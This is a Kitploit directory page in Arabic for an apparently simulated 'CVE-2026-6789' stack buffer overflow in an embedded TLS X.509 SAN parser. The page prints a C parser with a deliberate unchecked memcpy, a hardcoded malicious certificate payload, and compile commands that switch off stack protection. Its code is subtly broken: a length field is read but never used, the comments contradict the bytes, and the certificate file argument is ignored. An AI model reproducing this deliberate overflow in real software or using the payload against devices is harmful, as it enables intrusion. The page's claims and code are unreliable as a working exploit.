Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser — ثغرة تجاوز سعة المخزن المؤقت للمكدس (Stack buffer overflow) في محلل شهادات TLS مدمج باستخدام امتداد X.509 SAN مُصمم خصيصًا لتنفيذ تعليمات برمجية عن بُعد على أجهزة إنترنت الأشياء والأجهزة الصناعية. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubgeorge0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser

CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تجاوز سعة المخزن المؤقت للمكدس (Stack buffer overflow) في محلل شهادات TLS مدمج باستخدام امتداد X.509 SAN مُصمم خصيصًا لتنفيذ تعليمات برمجية عن بُعد على أجهزة إنترنت الأشياء والأجهزة الصناعية.

عرض المستودع
9منذ شهر واحدلم تتم المراجعة بعد

9. CVE-2026-6789 – تجاوز سعة المخزن المؤقت على المكدس في محلّل شهادات TLS المضمّن

نظرة عامة

تحتوي مكتبة TLS خفيفة الوزن وشائعة (محاكاة) على ثغرة تجاوز سعة المخزن المؤقت على المكدس عند تحليل امتدادات الاسم البديل للموضوع (Subject Alternative Name) في شهادات X.509 مع حقل طول مصمم بعناية.

الخطورة: حرجة (تنفيذ تعليمات برمجية عن بُعد على أجهزة إنترنت الأشياء/الأجهزة الصناعية)

محلّل C القابل للاستغلال وكود الاستغلال

// tls_x509_vuln.c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>

// Vulnerable certificate parser
struct cert {
    uint8_t *data;
    size_t len;
};

int parse_san_extension(struct cert *cert, char *san_out, size_t out_size) {
    // Assume we are inside an extension with OID for SAN.
    uint8_t *p = cert->data + 10; // skip to extension value
    uint16_t ext_len = (p[0] << 8) | p[1];
    p += 2;
    // ext_len includes a sequence of GeneralNames. We only handle dNSName.
    while (p < cert->data + cert->len) {
        uint8_t name_type = *p++;
        uint16_t name_len = (p[0] << 8) | p[1];
        p += 2;
        if (name_type == 2) { // dNSName
            // Vulnerability: memcpy without bounds check to san_out
            memcpy(san_out, p, name_len); // STACK BUFFER OVERFLOW if name_len > out_size
            san_out[name_len] = '\0';
            return 0;
        }
        p += name_len;
    }
    return -1;
}

int main(int argc, char **argv) {
    // Malicious certificate payload: crafted SAN with oversized dNSName
    uint8_t malicious_cert[] = {
        // ... header, then extension:
        0x30, 0x12, // SEQUENCE extension
        0x06, 0x03, 0x55, 0x1d, 0x11, // OID SAN
        0x04, 0x0b, // octet string, length 11
        // ext_len (should be 0x0009 but we use 0x00ff to overflow)
        0x00, 0xff, // ext_len = 255 (overstated)
        // Then a dNSName: type 2, length huge
        0x02, 0x01, 0x41, // dNSName "A" but the parser will read massive length due to ext_len
    };
    struct cert cert;
    cert.data = malicious_cert;
    cert.len = sizeof(malicious_cert);

    char san[16]; // small buffer
    parse_san_extension(&cert, san, sizeof(san));
    printf("SAN: %s\n", san);
    return 0;
}

CVE-2026-6789 – تجاوز سعة المخزن المؤقت على المكدس في SAN لشهادة X.509 في TLS المضمّن

Severity: Critical

📖 نظرة عامة

يسمح تجاوز سعة المخزن المؤقت القائم على المكدس في محلّل الشهادات لمكتبة TLS مضمّنة واسعة الاستخدام بتنفيذ تعليمات برمجية عن بُعد عندما يعالج الجهاز شهادة X.509 مصممة بعناية.

⚙️ تفاصيل الثغرة

  • النوع: تجاوز سعة المخزن المؤقت على المكدس
  • الأثر: تنفيذ تعليمات برمجية عن بُعد (قبل المصادقة على خوادم TLS)
  • السبب الجذري: ينسخ المحلّل اسم DNS من امتداد الاسم البديل للموضوع باستخدام حقل طول دون التحقق من حجم المخزن المؤقت للإخراج.

🧪 عرض الاستغلال

  1. إنشاء شهادة خبيثة:
    python craft_exploit_cert.py
    
  2. ترجمة وتشغيل المحلّل القابل للاستغلال (محاكاة):
    gcc tls_x509_vuln.c -o parser -fno-stack-protector -z execstack
    ./parser malicious.cer
    
تنزيل الأداة